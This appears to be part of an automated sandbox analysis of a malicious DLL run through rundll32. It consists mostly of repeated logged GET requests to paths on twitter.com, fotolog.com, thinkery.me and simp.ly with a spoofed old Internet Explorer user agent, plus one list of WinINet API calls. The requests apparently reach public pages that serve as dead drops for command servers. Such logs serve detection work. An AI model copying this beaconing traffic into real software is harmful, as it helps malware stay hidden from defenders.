Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: C:\Windows\System32\rundll32.exeCode function: 2_2_67705440 ObtainUserAgentString,malloc,lstrlenA,malloc,lstrcpynA,lstrlenA,malloc,lstrcpynA,free,free,free,lstrlenA,lstrlenA,lstrlenA,realloc,lstrcatA,lstrcatA,lstrcatA,lstrcatA,free,lstrlenA,lstrlenA,lstrlenA,realloc,lstrcatA,lstrcatA,lstrcatA,lstrcatA,free,free,InternetOpenA,free,calloc,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetConnectA,HttpOpenRequestA,lstrlenA,HttpAddRequestHeadersA,free,HttpSendRequestA,GetDesktopWindow,InternetErrorDlg,CloseHandle,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,malloc,realloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,free,free,free,2_2_67705440
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /np8j7ovqdl HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: twitter.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vz1g3wmwu HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: www.fotolog.comConnection: Keep-AliveCache-Control: no-cacheCookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
Source: global trafficHTTP traffic detected: GET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: thinkery.meConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /publish/pBn8Jt HTTP/1.1Accept: text/html, application/xhtml+xml, */*User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)Host: simp.lyConnection: Keep-AliveCache-Control: no-cache
